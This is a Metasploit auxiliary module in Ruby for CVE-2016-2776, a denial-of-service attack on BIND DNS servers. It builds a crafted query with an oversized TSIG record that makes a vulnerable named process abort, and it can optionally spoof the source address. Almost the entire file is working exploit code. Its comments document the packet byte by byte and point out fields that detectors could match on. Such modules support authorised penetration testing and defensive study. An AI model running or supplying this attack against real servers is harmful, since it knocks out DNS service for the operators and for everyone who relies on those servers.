##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos

  # Denial-of-service module for CVE-2016-2776. For each host the UDPScanner
  # mixin hands in, one crafted DNS query carrying an oversized TSIG record in
  # its additional section is sent; a vulnerable named aborts on an assertion
  # in buffer.c while rendering the response (hence CRASH_SERVICE_DOWN in
  # 'Notes'). Replies are never parsed: the module defines no scanner_process
  # and sets ScannerRecvWindow to 0.
  #
  # Options: RPORT (default 53) and an optional SRC_ADDR; when SRC_ADDR is set
  # the packet is injected with a spoofed source through the Capture mixin.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BIND TSIG Query Denial of Service',
        'Description' => %q{
          A defect in the rendering of messages into packets can cause named to
          exit with an assertion failure in buffer.c while constructing a response
          to a query that meets certain criteria.

          This assertion can be triggered even if the apparent source address
          isn't allowed to make queries.
        },
        # Research and Original PoC - msf module author
        'Author' => [
          'Martin Rocha',
          'Ezequiel Tavella',
          'Alejandro Parodi',
          'Infobyte Research Team'
        ],
        'References' => [
          ['CVE', '2016-2776'],
          ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']
        ],
        'DisclosureDate' => '2016-09-27',
        'License' => MSF_LICENSE,
        # Receive window of 0 seconds: nothing useful comes back from a crashed
        # server, so presumably the scanner should not linger waiting for
        # replies -- confirm against the UDPScanner mixin.
        'DefaultOptions' => { 'ScannerRecvWindow' => 0 },
        'Notes' => {
          # A successful run takes the target's named process down.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([
      Opt::RPORT(53),
      # Optional; selects the spoofed send path in scan_host.
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
    ])

    # Capture-mixin options that play no role here; keeps the visible option
    # list to RPORT and SRC_ADDR.
    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end

  # Sends the crafted query to one target.
  #
  # @param ip [String] target address supplied by the UDPScanner mixin
  #
  # With SRC_ADDR set the packet is injected via scanner_spoof_send from the
  # Capture mixin (presumably requiring raw-socket/pcap privileges -- verify);
  # otherwise it goes out over an ordinary UDP socket. Note that the
  # "Sending packet" status line is only printed on the non-spoofed path.
  def scan_host(ip)
    if datastore['SRC_ADDR']
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
    else
      print_status("Sending packet to #{ip}")
      scanner_send(payload, ip, rport)
    end
  end

  # Builds the crafted DNS query as a raw byte string.
  #
  # Layout (all sizes follow from the literals below):
  #   header       12 bytes: random ID, flags 0, QD=1, AN=0, NS=0, AR=1
  #   question     random two-label name (get_domain) + root, type A, class IN
  #   additional   255-octet owner name (3 * 64 + 62 + 1), type TSIG (250),
  #                class ANY, TTL 0, RDLENGTH 252
  #   TSIG RDATA   220-byte algorithm name (3 * 64 + 27 + 1) + time signed (6)
  #                + fudge (2) + MAC size (2) + MAC (16) + original ID (2)
  #                + error (2) + other len (2) = 252, matching RDLENGTH
  #
  # Notes for detection: the owner name sits at the 255-octet DNS name limit,
  # and several fields are constant across packets (TTL 0, fudge 300, MAC size
  # 16, Original Id 0x8f65, TSIG error 0), which can serve as signature
  # material. The TSIG Original Id never matches the randomised transaction
  # ID in the header.
  #
  # @return [String] the complete query, ready to hand to the send helpers
  def payload
    query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 2 random bytes (not 0x8f65; see Original Id below)
    query << "\x00\x00" # Flags: 0x0000 Standard query
    query << "\x00\x01" # Questions: 1
    query << "\x00\x00" # Answer RRs: 0
    query << "\x00\x00" # Authority RRs: 0
    query << "\x00\x01" # Additional RRs: 1

    # Domain Name
    query << get_domain # Random DNS Name
    query << "\x00" # [End of name]
    query << "\x00\x01" # Type: A (Host Address) (1)
    query << "\x00\x01" # Class: IN (0x0001)

    # Additional records. Name (255 octets including the terminator)
    query << ("\x3f" + Rex::Text.rand_text_alphanumeric(63)) * 3 # 192 bytes: ONE random 63-byte label, repeated 3 times
    query << "\x3d" + Rex::Text.rand_text_alphanumeric(61) # 62 bytes
    query << "\x00"

    query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
    query << "\x00\xff" # Class: ANY (0x00ff)
    query << "\x00\x00\x00\x00" # Time to live: 0
    query << "\x00\xfc" # Data length: 252 (must equal the RDATA built below)

    # Algorithm Name (220 octets including the terminator)
    query << ("\x3f" + Rex::Text.rand_text_alphanumeric(63)) * 3 # 192 bytes: one random label repeated 3 times
    query << "\x1A" + Rex::Text.rand_text_alphanumeric(26) # 27 bytes: length byte + 26 random
    query << "\x00"

    # Rest of TSIG
    query << "\x00\x00" + Rex::Text.rand_text_alphanumeric(4) # Time Signed (48-bit): 2 zero bytes + 4 random bytes
    query << "\x01\x2c" # Fudge: 300
    query << "\x00\x10" # MAC Size: 16
    query << Rex::Text.rand_text_alphanumeric(16) # MAC: 16 random bytes (no real signature)
    query << "\x8f\x65" # Original Id: 36709 (fixed; does not match the header ID)
    query << "\x00\x00" # Error: No error (0)
    query << "\x00\x00" # Other len: 0
  end

  # Builds the random two-label name used in the question section: a
  # 6-character label followed by a 3-character label, each preceded by its
  # length byte. The terminating zero byte is appended by the caller.
  #
  # @return [String] length-prefixed labels without the root terminator
  def get_domain
    domain = "\x06" + Rex::Text.rand_text_alphanumeric(6)
    org = "\x03" + Rex::Text.rand_text_alphanumeric(3)
    domain + org
  end
end